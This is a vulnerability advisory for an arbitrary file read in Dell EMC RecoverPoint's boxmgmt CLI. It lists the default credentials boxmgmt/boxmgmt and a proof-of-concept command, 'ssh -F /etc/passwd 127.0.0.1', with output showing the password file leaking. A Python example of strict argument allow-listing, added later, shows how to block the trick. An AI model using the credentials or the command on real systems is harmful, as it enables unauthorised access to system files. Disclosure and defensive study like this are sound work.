Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 Arbitrary File Read

2018.05.23
Credit: Paul Taylor
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200

# Exploit Title: Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read
# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
# Date: 2018-05-21
# Vendor Advisory: DSA-2018-095
# Vendor KB: https://support.emc.com/kb/521234
# Exploit Author: Paul Taylor
# Github: https://github.com/bao7uo/dell-emc_recoverpoint
# Website: https://www.foregenix.com/blog/foregenix-identify-dell-emc-recoverpoint-zero-day-vulnerabilities
# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
# CVE: N/A

# 1. Description
# When logging in as boxmgmt and running an internal command, the ssh command may be used
# to display the contents of files from the file system which are accessible to the boxmgmt user.

# 2. Proof of Concept
# Log in as boxmgmt via SSH (default credentials boxmgmt/boxmgmt)
# Select [3] Diagnostics
# Select [5] Run Internal Command
# ssh -F /etc/passwd 127.0.0.1

test-cluster: 5
This is the list of commands you are allowed to use:
ALAT
NetDiag
arp
arping
date
ethtool
kps.pl
netstat
ping
ping6
ssh
telnet
top
uptime
Enter internal command: ssh -F /etc/passwd 127.0.0.1
/etc/passwd: line 1: Bad configuration option: root:x:0:0:root:/root:/bin/tcsh
/etc/passwd: line 2: Bad configuration option: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
/etc/passwd: line 3: Bad configuration option: bin:x:2:2:bin:/bin:/usr/sbin/nologin
<SNIP>
/etc/passwd: terminating, 34 bad configuration options
Command "ssh -F /etc/passwd 127.0.0.1" exited with return code 65280
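
The output above shows a menu that restricts which command may run but not which arguments it receives. The following is an added example, not code from the advisory or from the vendor: it contrasts an assumed name-only check with a per-command argument allow-list that rejects the `ssh -F` line. The function names and the `ARG_POLICY` table are hypothetical.

```python
import ipaddress
import shlex

# Command names copied from the menu in the advisory output above.
ALLOWED = {"ALAT", "NetDiag", "arp", "arping", "date", "ethtool", "kps.pl",
           "netstat", "ping", "ping6", "ssh", "telnet", "top", "uptime"}

def name_only_check(line):
    """Assumed weak model: only the command name is compared to the list."""
    argv = shlex.split(line)
    return bool(argv) and argv[0] in ALLOWED

def _is_ip(text):
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False

def _is_port(text):
    return text.isascii() and text.isdigit() and 1 <= int(text) <= 65535

def ssh_args_ok(args):
    """Accept only `ssh [-p PORT] IP`; every other option, -F included, fails."""
    if len(args) == 3 and args[0] == "-p":
        return _is_port(args[1]) and _is_ip(args[2])
    return len(args) == 1 and _is_ip(args[0])

# Hypothetical per-command argument policies. A command with no policy
# may only be run bare, so new arguments must be allowed explicitly.
ARG_POLICY = {"ssh": ssh_args_ok}

def strict_check(line):
    """Validate name and arguments; the caller should exec the argv list directly, without a shell."""
    try:
        argv = shlex.split(line)
    except ValueError:          # unbalanced quotes and similar
        return False
    if not argv or argv[0] not in ALLOWED:
        return False
    policy = ARG_POLICY.get(argv[0])
    return policy(argv[1:]) if policy else len(argv) == 1

if __name__ == "__main__":
    poc = "ssh -F /etc/passwd 127.0.0.1"   # command line from the advisory
    print(name_only_check(poc), strict_check(poc))
```

Because the policy is an allow-list, any option that has not been explicitly permitted is refused without having to enumerate risky flags.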

